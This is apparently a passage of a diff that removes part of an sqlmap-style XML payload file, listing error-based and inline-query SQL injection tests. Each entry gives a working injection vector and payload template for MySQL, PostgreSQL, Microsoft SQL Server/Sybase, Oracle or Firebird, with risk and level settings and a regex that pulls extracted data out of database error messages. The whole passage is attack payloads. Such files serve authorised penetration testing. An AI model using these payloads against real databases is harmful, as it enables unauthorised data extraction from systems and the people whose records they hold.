-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND error-based - WHERE or HAVING clause (XMLType)</title>
-        <stype>2</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-            <dbms_version>&gt;= 8.1.6</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird AND error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>0</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.0 OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
-        <request>
-            <payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
-        <request>
-            <payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
-        <request>
-            <payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 4.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
-        <request>
-            <payload>OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
-        <request>
-            <payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle OR error-based - WHERE or HAVING clause (XMLType)</title>
-        <stype>2</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-            <dbms_version>&gt;= 8.1.6</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird OR error-based - WHERE or HAVING clause</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-        </details>
-    </test>
-    <!--
-         TODO: if possible, add payload for SQLite, Microsoft Access,
-         and SAP MaxDB - no known techniques at this time
-    -->
-    <!-- End of error-based tests - WHERE or HAVING clause -->
-
-
-    <!-- Error-based tests - Parameter replace -->
-    <test>
-        <title>MySQL &gt;= 5.0 error-based - Parameter replace</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
-        <request>
-            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
-        <request>
-            <payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>0</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
-        <request>
-            <payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL error-based - Parameter replace</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
-        <request>
-            <payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase error-based - Parameter replace</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
-        <request>
-            <payload>(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>0</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle error-based - Parameter replace</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
-        <request>
-            <payload>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird error-based - Parameter replace</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>0</risk>
-        <clause>1,3</clause>
-        <where>3</where>
-        <vector>(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-        </details>
-    </test>
-    <!-- End of error-based tests - Parameter replace -->
-
-
-    <!-- Error-based tests - GROUP BY and ORDER BY clauses -->
-    <test>
-        <title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
-        <request>
-            <payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)</title>
-        <stype>2</stype>
-        <level>4</level>
-        <risk>0</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
-        <request>
-            <payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
-        <request>
-            <payload>,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>3</clause>
-        <where>1</where>
-        <vector>,(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
-        <request>
-            <payload>,(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle error-based - GROUP BY and ORDER BY clauses</title>
-        <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>2,3</clause>
-        <where>1</where>
-        <vector>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
-        <request>
-            <payload>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-    <!--
-         TODO: if possible, add payload for SQLite, Microsoft Access
-         and SAP MaxDB - no known techniques at this time
-    -->
-    <!-- End of error-based tests - GROUP BY and ORDER BY clauses -->
-
-    <!-- Inline queries tests -->
-    <test>
-        <title>MySQL inline queries</title>
-        <stype>6</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,8</clause>
-        <where>3</where>
-        <vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
-        <request>
-            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
